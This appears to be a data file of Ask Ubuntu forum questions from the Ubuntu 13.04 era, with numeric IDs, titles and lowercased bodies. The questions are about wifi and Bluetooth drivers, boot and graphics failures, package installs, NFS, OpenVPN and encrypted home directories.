286734	how to downgrade broadcom wireless drivers bcmwl-kernel-source ?	after a fresh install of ubuntu 13.04 64-bit , my wifi is now misbehaving . it seems to lose internet connectivity from time to time , so this results in , for example , the web browser stops loading sites at the middle of the process , wait ~3 seconds , and then receive the rest of the site . this did n't happen in 12.10 , in the same laptop . another symptom that anounced that something was not going to be alright , was the wifi disconnecting for a moment when i hit `` continue '' in the first stage of the ubuntu installer , in the screen where you select `` update during install '' and `` install mp3 support '' . i have a broadcom bcm4313 card ( actually it 's a `` dell wlan 1501 '' card , but at this moment i do n't understand very well how this two brands relate to each other ) ~ $ lspci -vvnn | grep 14e4 12:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) i 've read that this might be a bug in the current driver shipped in ubuntu 13.04 : bcmwl-kernel-source 6.20.155.1+bdcom-0ubuntu6 how do i downgrade to a previous working version ? i tried following this instructions but 1 ) i ca n't install the old version from the repository because it does n't seem to be available for ubuntu 13.04. and 2 ) if i manually download and install a .deb file from here ( bcmwl-kernel-source_5.100.82.112+bdcom-0ubuntu3_amd64.deb ) , after reboot the system drops the wl controller and selects again the brcmsmac controller , as shown in the `` connection information '' dialog screen from the notification area . then , if i try to select it manually , i get : ~ $ sudo modprobe wl fatal : module wl not found . does this have something to do with the kernel version ? i.e . the .deb package not being compatible with my current kernel . any ideas ? maybe i have to recompile that source package ? if so , how ? thank you .
286740	bluetooth wo n't enable on lenovo g560 under ubuntu 13.04	i used to dualboot win 7 and ubuntu . when bluetooth was enabled under win7 , i had no problems using bluetooth in ubuntu . now , ubuntu 13.04 is my only os and there is no bluetooth . all i can do is flick the switch in systemsettings , but it says , that bluetooth is `` deactivated '' . i do not even have an icon in the menubar . i 'm feeling very dumb right now -.- [ update ] i did sudo apt-get install synaptics and installed additional software according to this question : bluetooth not working in ubuntu 13.04 . the indicator is back , but there is no functionality . bluetooth can not be switched on over the appindicator-menu no devices are detected scannig for devices returns `` no adapter '' found error message
286741	installing python-central	i have the python central tar.gz file . i dont know how to install it . i unzipped it but now what ? after unzipping it i run ./configure but i get a no such file or directory . yes i am in the directory that was created after i unzipped . ive been trying to use electrum , but i get a ecdsa is not installed error , cant install it because i need pip , but cant install pip cuz it needs python-central ?
286742	triple boot win 7 , win server 2008 , and ubuntu	i have a system that dual boots windows 7 and windows server 2008 r2 datacenter . i 'm trying to add ubuntu for a triple boot . every time i install ubuntu , it installs , but when i try to boot it , it fails . i 've installed from within windows , and i 've installed from a disk i made , by booting to the disk . it seems to be an issue with the boot loader . how can i successfully accomplish this task ?
286745	libreoffice resolution problem	this morning i upgraded to 13.04 from 12.10 . everything seemed to be working fine until i checked libreoffice and something had gone funny with the visuals ( and gnome integration ? my knowledge of ubuntu is pretty limited ) . the problem is the extra 'border ' around the top and right side , which basically bugs the hell out ( including the scrollbar , not visible below ) , showing whatever was on that part of the screen when libreoffice was opened and stopping the window maximising properly . resolution is 1024x600 ( acer aspire one notebook ) . i can try to answer any further questions , quite hard to accurately describe the problem .
286747	ubuntu server 12.04 : ca n't write to nfs share	i have installed a small home server running 12.04 , now trying to configure an nfs share with webmin version 1.620 . i have gradually lowered the security on the share to basically nil , yet any write operation to the share from any mac os x or windows 7 ( with nfsclient 1.7 ) is consistently rejected . the nfs client on windows e.g . returns `` permission denied '' ( along with lots of cryptic stuff ) when trying to create a new directory , or when dropping a file . any hint on the matter ? thanks a lot & best regards mark
286752	ubuntu upgrade failed	i 've tried to upgrade from 12.10 to 13.04 but it failed and result in `` unstable system '' or something . sudo apt-get install -f does n't work sudo do-release-upgrade says i 'm up to date . so i though of deleting my current unstable 13.04 ubuntu and install it fresh new ( if there is n't something else i can do ) , but the problem is that i have dual boot with windows . how can i delete my ubuntu and install it fresh new , without touching windows ?
286754	13.04 download problem	i am currently using ubuntu 12.10 and am trying to update to 13.04 and i get this error message , e : some index files failed to download . they have been ignored , or old ones used instead . how do i fix this ?
286755	installing ecdsa	how do i install ecdsa ? im getting this error ubuntu @ ubuntu : ~ $ electrum error : python-ecdsa does not seem to be installed . try 'sudo pip install ecdsa' ubuntu @ ubuntu : ~ $ sudo pip install ecdsa downloading/unpacking ecdsa running setup.py egg_info for package ecdsa traceback ( most recent call last ) : file `` '' , line 3 , in importerror : no module named setuptools.command complete output from command python setup.py egg_info : traceback ( most recent call last ) : file `` '' , line 3 , in importerror : no module named setuptools.command command python setup.py egg_info failed with error code 1 storing complete log in ./pip-log.txt ubuntu @ ubuntu : ~ $
286757	how do i install sasl2-bin dependencies ?	i 'm trying to install sasl2-bin on natty . however , it depends on db4.8-util , which could not be installed because the default package on natty is db4.7-util . if i try to install the 4.8 version either from the deb package or from source , it gets deeper into the dependency tree , i.e . it requires more packages to be updated . i did try to manually update them all but at one point ( after updating libc-bin ) it said i needed to update openssh but that will break a lot of things for me . on the other hand , without sasl , i ca n't run postfix . could someone please help me resolve this dependency issue ?
286764	how to install haskell platform for ubuntu 13.04 ?	how to install haskell platform for ubuntu 13.04 ? i get the following error when i type sudo apt-get install haskell-platform : e : unable to locate package haskell-platform error
286767	install nvidia drivers	i installed ubuntu 13.04 , but after the reboot theres only a black screen with the blinking bar on the top left . i found , that one possible solution is that the video drivers are not installed , so i tried it ( the weird thing is that `` try ubuntu without installing '' works perfectly fine ) . so i downloaded the .run file , but it 's always saying `` seems like you 're running a x server '' blahblah . i searched for maybe 2 hours for the solution , but none of the ones i found worked for me . can anybody please help me ? ps : i 'm pretty new to ubuntu ...
286768	ubuntu 13 fails to boot after live-dvd install	i just installed from the dvd-iso image over ubuntu 12 . system will not boot from hd . i can get grub2 menu and have tried the nomodeset option . however , even in recovery mode , the system hangs when trying to start in fail-safe x-mode . i just get a black screen with blinking cursor . even worse , system does n't respond to alt-ctrl-delete and requires a system power down to get restarted ! yes , i have an nvidia card ( 550-ti ) which is mature and pretty generic . any suggestions ? i can boot from the live-dvd , but ca n't adjust monitors or get x-config for nvidia running from the live version . after disabling 'quiet ' in the boot cmd , i can see it run through and auto-login after which it just blinks the cursor with no further msgs .
286777	sharing internet connection	greeting , i have a portable model . i am intended to use it to share internet connection from ubuntu 13.04 to my android tablet . can anybody help me how can i setup my ubuntu 13.04 as a server in order to share the internet connection to my android tablet ?
286778	bad wifi range with bcm4313 card	i have an hp-envy-4 laptop ( dual boot ubuntu 13.04 and windows 8 ) with a bcm4313 wireless card . the strength not great when close to the router . however , the wifi works well on windows 8 . i tried installing the broadcom sta wireless driver but resulted in wicd not detecting my wifi connection . what could be the issue and how can i resolve it ? any help would be appreciated . thanks ! here is some additional information : pooja @ pooja-hp-envy-4-notebook-pc : ~ $ sudo modprobe brcmsmac pooja @ pooja-hp-envy-4-notebook-pc : ~ $ sudo rfkill unblock all pooja @ pooja-hp-envy-4-notebook-pc : ~ $ rfkill list all 2 : phy0 : wireless lan soft blocked : no hard blocked : no 3 : hci0 : bluetooth soft blocked : no hard blocked : no results with bcmwl-kernel-source installed : lspci -k | grep wl subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1895 subsystem : hewlett-packard company device 1795 kernel driver in use : wl dmesg | grep -e wl -e eth [ 0.000000 ] dmi : hewlett-packard hp envy 4 notebook pc/1895 , bios f.0c 07/09/2012 [ 1.357432 ] r8169 0000:07:00.2 eth0 : rtl8411 at 0xffffc90000678000 , 10:60:4b : d7:0d : f8 , xid 08800800 irq 46 [ 1.357436 ] r8169 0000:07:00.2 eth0 : jumbo features [ frames : 9200 bytes , tx checksumming : ko ] [ 6.354058 ] acpi error : method parse/execution failed [ \_sb_.wmid.esdt ] ( node ffff88015923fa78 ) , ae_not_exist ( 20121018/psparse-537 ) [ 6.354064 ] acpi error : method parse/execution failed [ \_sb_.pci0.lpcb.ec0_._q42 ] ( node ffff88015926af28 ) , ae_not_exist ( 20121018/psparse-537 ) [ 18.706491 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 18.889924 ] wl : module license 'mixed/proprietary ' taints kernel . [ 18.899524 ] vga switcheroo : detected switching method \_sb_.pci0.gfx0.atpx handle [ 18.951570 ] info @ wl_cfg80211_attach : registered cfg80211 phy [ 19.225219 ] eth1 : broadcom bcm4727 802.11 hybrid wireless controller 6.20.155.1 ( r326264 ) [ 30.119193 ] r8169 0000:07:00.2 eth0 : link down [ 30.119258 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 80.447063 ] r8169 0000:07:00.2 eth0 : link down [ 80.447120 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 81.937320 ] r8169 0000:07:00.2 eth0 : link down [ 81.937376 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready rfkill list all 0 : phy0 : wireless lan soft blocked : no hard blocked : no 1 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no 3 : hp-wifi : wireless lan soft blocked : no hard blocked : yes 4 : hp-bluetooth : bluetooth soft blocked : no hard blocked : yes
286787	install amd catalyst drivers in ubuntu 13.04	i installed ubuntu 13.04 and i have an ati radeon hd series graphics card on my system . the question is : what is the proper way to install the latest amd catalyst drivers in ubuntu 13.04 raring ringtail ?
286792	overheating problem on ubuntu 13.04	i have recently upgraded ubuntu to 13.04 . since this time i have overheating problems with cpu and graphic card . i also ca n't use fglrx drivers , because ubuntu does not work properly , so i use the driver that was installed ( gallium 0.4 on amd redwood ) . i have intel core i7 cpu q 720 and mobility radeon hd5730 .
286795	laptop boots with blank screen but hdmi monitor is working	english translation : hello all , can you help me fix this problem . i installed ubuntu on my notebook for the first time . my laptop is an acer aspire 5336 i installed ubuntu while connected to an external hdmi monitor because my laptop does not work and you see black screen . how can i fix this ? original spanish : problema mi portatil con pantalla negra pero hdmi monitor si funciona hola a todos , podéis ayudarme como solucionar el problema . mi portátil , queremos instalar ubuntu por primera vez . mi portátil tiene marca es acer y su modelo es aspire 5336 he instalado ubuntu desde hdmi monitor porque mi portátil no funciona y se ve pantalla negra . como se soluciona ? por favor mil gracias .
286796	ubuntu 13.04 suffers graphics corruption ?	ubuntu 's dash turns green when i press the super key after upgrading from ubuntu 12.10 to ubuntu 13.04 . i 'm not sure what causes the problem , and i have n't found any similar problems . i have included a screenshot so you can see for yourself . any solutions ?
286797	booting problem with ubuntu 13.04	i installed ubuntu 13.04 via dvd and everytime i restart , theres just a black screen bith the blinking cursor . i tried updating my video driver , but that did not help . i tried it with ubuntu 12.something , too but there was the same problem . i searched 3 hours straight and tried everzthing i found but nothing yet helped . i have the nvidia geforce gtx 260 along with an asus m5a78l - m lx mainboard and the amd fx-6100 .
286798	ubuntu restricted extras installation via usc stuck on `` applying changes ''	ubuntu restricted extras installation via usc stuck on `` applying changes '' on my hp envy touchsmart 14 '' ( series 14-3010nr ) , i have recently installed the final release of 13.04 but when i try to install ubuntu restricted extras , the above issue occurs . on 12.10 , i also had the issue but after shutting off my computer to stop teh process then uninstalling ure then reinstalling it then getting stuck again then uninstalling it then reinstalling it again for a few times then reinstalling ubuntu then installing ure then getting stuck again then uninstalling it then reinstalling it again for a few times before it finally installed fully . huh ? simply put , i uninstalled , reinstalled , got stuck , reboot , repeat all multiple times , then reinstall ubuntu then start the whole process again until it worked on 12.10 . well , that 's quite a problem on its own but this time on 13.04 , this `` method '' wo n't yield any results and the problem persists . maybe i will have to do it even more times than i already have ? i 'm not willing to do that again because it 's very time consuming . update 1 : i 'm getting stuck at `` ttf-mscorefonts-installer : downloading http : //downloads.sourceforge.net/corefonts/comic32.exe '' when installing ure via terminal but this is probably also the case when instlaling from usc .
286799	how to load ubuntu 12.04 from grub after update on 04/26/13	computer details : toshiba , natively runs windows7 64-bit . i currently dual-boot windows 7 / linux and have a virtual hard drive of windows 8 ( rarely used ) background : i have been using ubuntu 12.04 for a month now , with moderate difficulty . after installing all the recommended updates using the update manager on april 26th 2013 , i shut down my computer . the next day instead of getting to the usual linux boot loader , i get a terminal-looking screen with grub that i have never seen before . what usually happens when i boot : i get a list of three options ( windows 8 / windows 7 / ubuntu ) . i would select ubuntu and it would load another list of options ( linux generic / linux generic recovery mode / previous installations of linux/ linux generic development mode / linux development recovery mode ) . i would select the first option and it would bring me to the log-in screen . what happens now after the update : i would load ubuntu in the first menu , and instead of going to the second menu it will load a black screen with white text with the header `` gnu grub version 1.99-21ubuntu3.9 '' and the subheading `` minimal bash-like editing is supported . for the first word , tab lists possible command completions . anywhere else tab lists possible device or file completions . '' it will prompt me for commands in grub > what i have tried : i have no idea what this all means , but i have tried some of the suggestions in http : //ubuntuforums.org/showthread.php ? t=2063281 ( did not work because `` linux vmlinuz root=/dev/sda1 '' is an invalid command and `` ( hd0 , msdos1 ) /boot '' did not return anything close to the expected output of `` vmlinuz-3.2.0-xx-generic '' ) . similar threads do not have the same problems of me ( they refer to grub 2 or fresh installs ) plea for help : please teach me how to run ubuntu from this grub loader ( or how to restore it to the boot menu i had before ) . i am not very experienced in linux so please be as explicit as possible in your instructions . edit : i tried using the command `` boot '' from grub , but it gave the error `` no loaded kernel ''
286808	voice recognition	as it was presented in omg ! ubuntu ! a voice recognition tool is being developed and will possible deploy in ubuntu touch and ubuntu desktop . although beyond the video shared in youtube i had no more information about that , rumors said that a testing ppa would be available for ubuntu 13.04 , although i did n't got anything else about this matter . so if anyone knows about a testing ppa or any other way to test it share with us .
286810	problems with netflix-app after upgrading to 13.04	i recently upgrade my desktop to 13.04 xunbuntu with no errors or issues at all . however now i am getting a need to upgrade silverlight screen in netflix using the netflix app . i realized this is a 3rd party application running a wine patch of firefox/silverlight and the ubuntu team is not responsible for providing a solution , but at least i want to put it out there for other people who are considering upgrading . i did try to upgrade the netflix application and , it did call for an update but it did not work . i still run xubuntu 12.10 in my laptop and it is running like a champ ! with no issues with netflix app . i hate going back to the days of dual reboot in order to watch netflix but aside from this issue 13.04 runs great ! please if someone else have run to an issue similar to mines . i would love hear how you got around it .
286811	do i need to fully update 12.10 before upgrading to 13.04 ? ( non-internet usb upgrade )	i 'm wondering if i need to install all updates on 12.10 before i upgrade to 13.04 . i 'm not using the update manager to upgrade , but i 'm using a usb stick instead . i 've always liked the way that way of upgrading turned out vs the internal internet upgrade system . also , my packages/software sources are broken preventing me from updating . can i still use a usb stick to safely upgrade ? or does my current install need to be in working order ? i do n't need help fixing my current install ; i just do n't want to do work all that work fixing it if i do n't have to .
286812	connects to openvpn on ubuntu server 12.04 but can not browse internet ?	i 'm trying to connect to ubuntu server 12.04 running openvpn from my ubuntu desktop running ubuntu 12.04.. openvpn client connects . but i can not browse any ineternet . i can ping and ssh to my server when i 'm connected through vpn . my client config file dev tun client proto udp remote xxx.xxx.xxx.xxx 1194 resolv-retry infinite nobind tun-mtu 1500 tun-mtu-extra 50 fragment 1300 mssfix 1450 persist-key persist-tun ca ca.crt cert client1.crt key client1.key auth none cipher none comp-lzo reneg-sec 0 verb 3 my server config dev tun proto udp port 1194 tun-mtu 1500 tun-mtu-extra 50 mssfix 1450 fragment 1300 ca /etc/openvpn/easy-rsa/keys/ca.crt cert /etc/openvpn/easy-rsa/keys/server.crt key /etc/openvpn/easy-rsa/keys/server.key dh /etc/openvpn/easy-rsa/keys/dh1024.pem user nobody group nogroup server 10.8.0.0 255.255.255.0 persist-key persist-tun status /var/log/openvpn-status.log verb 3 client-to-client push `` redirect-gateway def1 '' push `` dhcp-option dns 8.8.8.8 '' push `` dhcp-option dns 8.8.4.4 '' log-append /var/log/openvpn comp-lzo my server openvpn log sun apr 28 00:18:13 2013 openvpn 2.2.1 x86_64-linux-gnu [ ssl ] [ lzo2 ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ pf_inet6 ] [ ipv6 payload 20110424-2 ( 2.2rc2 ) ] built on feb 27 2013 sun apr 28 00:18:13 2013 warning : -- keepalive option is missing from server config sun apr 28 00:18:13 2013 note : the current -- script-security setting may allow this configuration to call user-defined scripts sun apr 28 00:18:13 2013 diffie-hellman initialized with 1024 bit key sun apr 28 00:18:13 2013 tls-auth mtu parms [ l:1592 d:138 ef:38 eb:0 et:0 el:0 ] sun apr 28 00:18:13 2013 socket buffers : r= [ 245760- > 131072 ] s= [ 245760- > 131072 ] sun apr 28 00:18:13 2013 route : default_gateway=undef sun apr 28 00:18:13 2013 tun/tap device tun0 opened sun apr 28 00:18:13 2013 tun/tap tx queue length set to 100 sun apr 28 00:18:13 2013 do_ifconfig , tt- > ipv6=0 , tt- > did_ifconfig_ipv6_setup=0 sun apr 28 00:18:13 2013 /sbin/ifconfig tun0 10.8.0.1 pointopoint 10.8.0.2 mtu 1500 sun apr 28 00:18:13 2013 /sbin/route add -net 10.8.0.0 netmask 255.255.255.0 gw 10.8.0.2 sun apr 28 00:18:13 2013 data channel mtu parms [ l:1592 d:1450 ef:42 eb:135 et:50 el:0 af:3/1 ] sun apr 28 00:18:13 2013 gid set to nogroup sun apr 28 00:18:13 2013 uid set to nobody sun apr 28 00:18:13 2013 udpv4 link local ( bound ) : [ undef ] sun apr 28 00:18:13 2013 udpv4 link remote : [ undef ] sun apr 28 00:18:13 2013 multi : multi_init called , r=256 v=256 sun apr 28 00:18:13 2013 ifconfig pool : base=10.8.0.4 size=62 , ipv6=0 sun apr 28 00:18:13 2013 initialization sequence completed sun apr 28 00:18:25 2013 multi : multi_create_instance called sun apr 28 00:18:25 2013 xxx.xxx.xxx.xxx:17080 re-using ssl/tls context sun apr 28 00:18:25 2013 xxx.xxx.xxx.xxx:17080 lzo compression initialized sun apr 28 00:18:25 2013 xxx.xxx.xxx.xxx:17080 control channel mtu parms [ l:1592 d:138 ef:38 eb:0 et:0 el:0 ] sun apr 28 00:18:25 2013 xxx.xxx.xxx.xxx:17080 data channel mtu parms [ l:1592 d:1450 ef:42 eb:135 et:50 el:0 af:3/1 ] sun apr 28 00:18:25 2013 xxx.xxx.xxx.xxx:17080 local options hash ( ver=v4 ) : 'ee1ac52f' sun apr 28 00:18:25 2013 xxx.xxx.xxx.xxx:17080 expected remote options hash ( ver=v4 ) : '4b8af814' sun apr 28 00:18:25 2013 xxx.xxx.xxx.xxx:17080 tls : initial packet from [ af_inet ] xxx.xxx.xxx.xxx:17080 , sid=116c10cf 9837ceb5 sun apr 28 00:18:28 2013 xxx.xxx.xxx.xxx:17080 verify ok : depth=1 , /c=us/st=ml sun apr 28 00:18:28 2013 xxx.xxx.xxx.xxx:17080 verify ok : depth=0 , /c=us/st=ml sun apr 28 00:18:29 2013 xxx.xxx.xxx.xxx:17080 warning : 'link-mtu ' is used inconsistently , local='link-mtu 1592 ' , remote='link-mtu 1541' sun apr 28 00:18:29 2013 xxx.xxx.xxx.xxx:17080 warning : 'tun-mtu ' is used inconsistently , local='tun-mtu 1550 ' , remote='tun-mtu 1500' sun apr 28 00:18:29 2013 xxx.xxx.xxx.xxx:17080 warning : 'comp-lzo ' is present in local config but missing in remote config , local='comp-lzo' sun apr 28 00:18:29 2013 xxx.xxx.xxx.xxx:17080 data channel encrypt : cipher 'bf-cbc ' initialized with 128 bit key sun apr 28 00:18:29 2013 xxx.xxx.xxx.xxx:17080 data channel encrypt : using 160 bit message hash 'sha1 ' for hmac authentication sun apr 28 00:18:29 2013 xxx.xxx.xxx.xxx:17080 data channel decrypt : cipher 'bf-cbc ' initialized with 128 bit key sun apr 28 00:18:29 2013 xxx.xxx.xxx.xxx:17080 data channel decrypt : using 160 bit message hash 'sha1 ' for hmac authentication sun apr 28 00:18:29 2013 xxx.xxx.xxx.xxx:17080 control channel : tlsv1 , cipher tlsv1/sslv3 dhe-rsa-aes256-sha , 1024 bit rsa sun apr 28 00:18:29 2013 xxx.xxx.xxx.xxx:17080 [ testserver ] peer connection initiated with [ af_inet ] xxx.xxx.xxx.xxx:17080 sun apr 28 00:18:29 2013 testserver/xxx.xxx.xxx.xxx:17080 multi_sva : pool returned ipv4=10.8.0.6 , ipv6=1 : :1f00:0 : d7f:0 sun apr 28 00:18:29 2013 testserver/xxx.xxx.xxx.xxx:17080 multi : learn : 10.8.0.6 - > testserver/xxx.xxx.xxx.xxx:17080 sun apr 28 00:18:29 2013 testserver/xxx.xxx.xxx.xxx:17080 multi : primary virtual ip for testserver/xxx.xxx.xxx.xxx:17080 : 10.8.0.6 sun apr 28 00:18:32 2013 testserver/xxx.xxx.xxx.xxx:17080 push : received control message : 'push_request' sun apr 28 00:18:32 2013 testserver/xxx.xxx.xxx.xxx:17080 send_push_reply ( ) : safe_cap=960 sun apr 28 00:18:32 2013 testserver/xxx.xxx.xxx.xxx:17080 sent control [ testserver ] : 'push_reply , redirect-gateway def1 , dhcp-option dns 8.8.8.8 , dhcp-option dns 8.8.4.4 , route 10.8.0.0 255.255.255.0 , topology net30 , ifconfig 10.8.0.6 10.8.0.5 ' ( status=1 ) sun apr 28 00:18:33 2013 testserver/xxx.xxx.xxx.xxx:17080 bad lzo decompression header byte : 69 sun apr 28 00:18:33 2013 testserver/xxx.xxx.xxx.xxx:17080 bad lzo decompression header byte : 69 sun apr 28 00:18:35 2013 testserver/xxx.xxx.xxx.xxx:17080 bad lzo decompression header byte : 69 sun apr 28 00:20:34 2013 multi : multi_create_instance called sun apr 28 00:20:34 2013 xxx.xxx.xxx.xxx:17085 re-using ssl/tls context sun apr 28 00:20:34 2013 xxx.xxx.xxx.xxx:17085 lzo compression initialized sun apr 28 00:20:34 2013 xxx.xxx.xxx.xxx:17085 control channel mtu parms [ l:1592 d:138 ef:38 eb:0 et:0 el:0 ] sun apr 28 00:20:34 2013 xxx.xxx.xxx.xxx:17085 data channel mtu parms [ l:1592 d:1450 ef:42 eb:135 et:50 el:0 af:3/1 ] sun apr 28 00:20:34 2013 xxx.xxx.xxx.xxx:17085 local options hash ( ver=v4 ) : 'ee1ac52f' sun apr 28 00:20:34 2013 xxx.xxx.xxx.xxx:17085 expected remote options hash ( ver=v4 ) : '4b8af814' sun apr 28 00:20:34 2013 xxx.xxx.xxx.xxx:17085 tls : initial packet from [ af_inet ] xxx.xxx.xxx.xxx:17085 , sid=01d0125c 8d8061c6 sun apr 28 00:20:38 2013 xxx.xxx.xxx.xxx:17085 verify ok : depth=1 , /c=us/st=ml/l=maryland/o=testserver/ou=ln/cn=testserver/name=testserver/emailaddress=testserver @ testserver.com sun apr 28 00:20:38 2013 xxx.xxx.xxx.xxx:17085 verify ok : depth=0 , /c=us/st=ml/l=maryland/o=testserver/ou=ln/cn=testserver/name=testserver/emailaddress=testserver @ testserver.com sun apr 28 00:20:39 2013 xxx.xxx.xxx.xxx:17085 warning : 'link-mtu ' is used inconsistently , local='link-mtu 1592 ' , remote='link-mtu 1541' sun apr 28 00:20:39 2013 xxx.xxx.xxx.xxx:17085 warning : 'tun-mtu ' is used inconsistently , local='tun-mtu 1550 ' , remote='tun-mtu 1500' sun apr 28 00:20:39 2013 xxx.xxx.xxx.xxx:17085 warning : 'comp-lzo ' is present in local config but missing in remote config , local='comp-lzo' sun apr 28 00:20:39 2013 xxx.xxx.xxx.xxx:17085 data channel encrypt : cipher 'bf-cbc ' initialized with 128 bit key sun apr 28 00:20:39 2013 xxx.xxx.xxx.xxx:17085 data channel encrypt : using 160 bit message hash 'sha1 ' for hmac authentication sun apr 28 00:20:39 2013 xxx.xxx.xxx.xxx:17085 data channel decrypt : cipher 'bf-cbc ' initialized with 128 bit key sun apr 28 00:20:39 2013 xxx.xxx.xxx.xxx:17085 data channel decrypt : using 160 bit message hash 'sha1 ' for hmac authentication sun apr 28 00:20:39 2013 xxx.xxx.xxx.xxx:17085 control channel : tlsv1 , cipher tlsv1/sslv3 dhe-rsa-aes256-sha , 1024 bit rsa sun apr 28 00:20:39 2013 xxx.xxx.xxx.xxx:17085 [ testserver ] peer connection initiated with [ af_inet ] xxx.xxx.xxx.xxx:17085 sun apr 28 00:20:39 2013 multi : new connection by client 'testserver ' will cause previous active sessions by this client to be dropped . remember to use the -- duplicate-cn option if you want multiple clients using the same certificate or username to concurrently connect . sun apr 28 00:20:39 2013 multi_sva : pool returned ipv4=10.8.0.6 , ipv6= : :803b:7e76 : d7f:0 sun apr 28 00:20:39 2013 multi : learn : 10.8.0.6 - > testserver/xxx.xxx.xxx.xxx:17085 sun apr 28 00:20:39 2013 multi : primary virtual ip for testserver/xxx.xxx.xxx.xxx:17085 : 10.8.0.6 sun apr 28 00:20:41 2013 testserver/xxx.xxx.xxx.xxx:17085 push : received control message : 'push_request' sun apr 28 00:20:41 2013 testserver/xxx.xxx.xxx.xxx:17085 send_push_reply ( ) : safe_cap=960 sun apr 28 00:20:41 2013 testserver/xxx.xxx.xxx.xxx:17085 sent control [ testserver ] : 'push_reply , redirect-gateway def1 , dhcp-option dns 8.8.8.8 , dhcp-option dns 8.8.4.4 , route 10.8.0.0 255.255.255.0 , topology net30 , ifconfig 10.8.0.6 10.8.0.5 ' ( status=1 ) anybody kindly explain what 's going wrong . thank you
286814	windows boot usb problem 13.04	i seem to be having trouble with 'start up disk creator' the attached image shows a message that flashes off and on and off in rapid succession that i cant read . i seems to say i have a partition error so i changed the partition through 'g-parted ' and formatted the stick ( to ntfs ) for a windows boot but it let me create a windows boot stick from an iso or disk image . i have used a couple of other programs and the problem just re-occurs everytime , some let me let 50 % done then it crashes . i need windows because wine is just silly some times and i want to play gta3 ( old i know but still the best game ever ) but use ubuntu for everything else . i am running 13.04 and wonder what i can do to remedy the problem . thanks guys
286823	when i try to install ubuntu /kubunu i get a blank screen	intento instalar ubuntu 13 desde una usb , pero luego de oprimir start para instalarlo , se apaga la pantalla y no sucede nada mas , lo mismo pasa con kubuntu , mi laptop es una hp compac cq45 多que puedo hacer ? ... english i tried installing ubuntu 13.04 from usb , but when i press start to install it , the screen goes blank , and nothing else happens , the same thing happens with kubuntu , my laptop is a hp compaq cq45 what do i do ?
286828	ca n't access encrypted home from other ubuntu releases from 13.04	today i installed raring ringtail ( again ) , 13.04 ( production release ) , clean in a fresh partition on an amd x2 64-bit system . i have a parallel installation of 12.10 and another one of 12.04 on other partitions . all $ home dirs are encrypted . from 13.04 i can not get to the other encrypted homedirs . dman @ nomotek-ur : /media/dman/nomotek-q/home/dman $ cat readme.txt this directory has been unmounted to protect your data . from the graphical desktop , click on : `` access your private data '' or from the command line , run : ecryptfs-mount-private dman @ nomotek-ur : /media/dman/nomotek-q/home/dman $ sudo ecryptfs-mount-private enter your login passphrase : inserted auth tok with sig [ xxxx ] into the user session keyring fopen : no such file or directory i did see that .ecryptfs and .private are soft links and that they were set to a full path that is no longer valid from the currently booted os . so i reset the links to relative paths pointing to the old filesystem . i still get the same error as to fopen .
286829	13.04 will not boot on custom pc	i put in the dvd i just burnt of 13.04 in my disc drive and when i go to the boot menu , i click on uefi and it says `` secure boot not enabled . '' then it loads up to a black screen with the text underscore thing . my computer is an asrock z77 pro4 with an intel i5-3570k . i have a seagate hdd and 8 gigs of corsair ram . i am currently running windows 8 x64 . i did download the x64 file too .
286831	installed 13.04 clean on a machine that used to run 12.10 . no longer boots	64-bit . i was doing fine with 12.10 but i read that 13.04 took care of a few of the more sluggish aspects of 12.10 so i decided to upgrade . the installation package seemed significantly less smooth than 12.10- instead of a snappy , smooth experience it had a few graphical bugs and took a long time to load , with various pools of unresponsiveness . regardless , i went through with it . now , unless i boot from usb from the bios menu , the computer simply does not boot ubuntu . i re-installed , to no effect . there is just a single flickering | on the top-left . randomly pressing keys , after the first 7 or so , starts producing system beeps . the system is not completely unresponsive : it turns the screen on-and-off if i press `` ctrl+alt+del '' . pressing shift makes no difference . hardware info : tecra m11 . nvidia quadro nvs 150m . 4gb ram .
286832	black screen when booting live usb ( ubuntu 12.10 and 13.04 )	this forum is my last chance . i have a acer aspire x3470 and i am trying to boot ubuntu live usb . i already tried to boot from the ubuntu desktop image 12.10 and 13.04 but with the same result . when i boot my pc i see the grub menu and i select the first entry for booting without installation . after that i see that my usb device tries to read some data ( i see it on the led ) and then it stops reading from the device . afterwards nothing happens and all i see is a black screen . i already tried the following boot parameters with no result : delete the quiet and splash entries nomodeset xforcevesa vga=normal radeon.modeset=0 , radeon.modeset=1 , i915.broken=0 , i915.broken=1 acpi_osi=linux , acpi=off acpi_backlight=vendor my pc has the following properties : windows 8 pre installed gpt acer bios ( newest firmeware ) secure boot , legacy boot i already tried all kind of combinations for secure boot and legacy boot and i disabled the fast boot option . after selecting the grub menu entry the menu disappears and everything i can see is my black screen ( but the screen device is on just as the backlight ) nothing more . i tried to force grub to be more verbose and to show me what he is doing but with no success . i have no hint what happens in background and why ubuntu is not loading . i copied the ubuntu desktop images with win32 disk imager , unetbootin and usb live creater always with the same result : - ( thanks in advance @ solved : hello i solved the problem . the usb stick was formated with fat and should be formated with fat32 .
286834	bluetooth not working in ubuntu 13.04	i recently installed ubuntu 13.04 in dual boot with 12.04.1 . the problem i have is with the bluetooth not working . i 've tried searching for my phone , but no luck . i 've installed blueman and still no go . bluetooth is working just fine on 12.04.1 , but on 13.04 it is simply dead . personal file sharing is enabled on both versions , visibility is enabled but no matter what i do i ca n't get it to work . this is really annoying . how can i fix this problem ?
